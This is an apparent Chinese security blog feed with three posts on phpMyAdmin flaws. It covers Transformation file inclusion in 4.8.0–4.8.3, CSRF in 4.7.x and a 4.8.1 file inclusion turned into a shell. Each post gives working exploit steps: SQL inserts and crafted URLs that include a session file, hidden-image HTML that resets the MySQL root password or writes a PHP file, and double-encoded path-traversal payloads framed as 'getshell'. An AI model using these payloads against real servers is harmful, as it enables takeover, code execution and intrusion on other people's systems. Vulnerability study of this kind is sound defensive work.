phpmyadmin – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:24:44 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 Phpmyadmin4.8.0~4.8.3任意文件包含 /web/628.html Fri, 21 Dec 2018 00:41:32 +0000 /?p=628 前言

2018年12月7日,phpmyadmin官方发布公告修复了一个由Transformation特性引起的任意文件包含漏洞

漏洞分析

Transformation是phpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段Filename,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击并在浏览器的新窗口中看到这个文件。

通常情况下Transformation的规则存储在每个数据库的pma__column_info表中,而在phpMyAdmin 4.8.0~4.8.3版本中,由于对转换参数处理不当,导致了任意文件包含漏洞的出现。

这些转换在phpMyAdmin的column_info表中定义,他通常已经存在于phpMyAdmin的系统表中。但是每个数据库都可以生成自己的版本。要为特定数据库生成phpmyadmin系统表,可以这样生成

http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*

它将会创建一个pma__*表的集合到你数据库中。

说了这么多,我们来看下具体产生漏洞的代码tbl_replace.php

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[省略]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
   $filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
   if (is_file($filename)) {
      include_once $filename;
      $classname = Transformations::getClassName($filename);
      /** @var IOTransformationsPlugin $transformation_plugin */
      $transformation_plugin = new $classname();
      $transformation_options = Transformations::getOptions(
         $mime_map[$column_name]['input_transformation_options']
      );
      $current_value = $transformation_plugin->applyTransformation(
         $current_value, $transformation_options
      );
      // check if transformation was successful or not
      // and accordingly set error messages & insert_fail
      if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
         $insert_fail = true;
         $row_skipped = true;
         $insert_errors[] = sprintf(
            __('Row: %1$s, Column: %2$s, Error: %3$s'),
            $rownumber, $column_name,
            $transformation_plugin->getError()
         );
      }
   }
}

拼接到$filename的变量$mime_map[$column_name]['input_transformation']来自于数据表pma__column_info中的input_transformation字段,因为数据库中的内容用户可控,从而产生了任意文件包含漏洞。

漏洞利用

  1. 创建一个新的数据库foo和一个随机的bar表,在表中创建一个baz字段,然后把我们的php代码写入session 
    CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. 创建phpmyadmin系统表在你的foo数据库中 
    http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. 将篡改后的Transformation数据插入表pma__columninfo中:将yourSessionId替换成你的会话ID,即COOKIE中phpMyAdmin的值 
    INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../tmp/sess_{yourSessionId}','plop';
  4. 然后访问 
    http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

    如果利用成功,则会返回phpinfo();

]]> phpMyAdmin 4.7.x CSRF 漏洞利用 /web/437.html Thu, 28 Jun 2018 03:20:15 +0000 /?p=402

原文 https://www.webshell.cc/6553.html

修改root密码:

保存为:webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc

写文件

首先你要知道路径

保存为:webshell.html

 

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

]]> phpmyadmin4.8.1后台getshell /web/431.html Fri, 22 Jun 2018 07:49:35 +0000 /?p=371 出处@ChaMd5安全团队

 

官网下载的最新版,文件名是phpMyAdmin-4.8.1-all-languages.zip

 

问题就出现在了 /index.php

找到55~63行

 

第61行出现了 include $_REQUEST[‘target’];

很明显这是LFI的前兆,我们只要绕过55~59的限制就行

第57行限制 target 参数不能以index开头

第58行限制 target 参数不能出现在 $target_blacklist 内

找到 $target_blacklist 的定义:

就在 /index.php 的第50行

只要 target 参数不是 import.php 或 export.php 就行,最后一个限制是Core::checkPageValidity($_REQUEST[‘target’])

找到Core类的checkPageValidity方法:

定义在了 \libraries\classes\core.php 的第443行

问题出现在了第 465 行的 urldecode()

我们可以利用这个函数绕过白名单检测!

我把 ? 两次url编码为 %253f 即可绕过验证!

 

Payload:

  1. http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini

本以为漏洞到这就结束了,因为我没有找到phpmyadmin可以进行文件操作来实现Getshell的地方,过了好几周后突发灵感,想到了一个不用写文件也能拿Shell的方法。

我们都知道,登入phpmyadmin后,数据库就是完全可以控制的了,那我们是否可以把WebShell写入到数据库中然后包含数据库文件?

本地测试了一下,发现如果把WebShell当做数据表的字段值是可以完美的写入到数据库文件当中的:

找到对应的数据库文件:

包含之:

Payload:

  1. http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm
]]>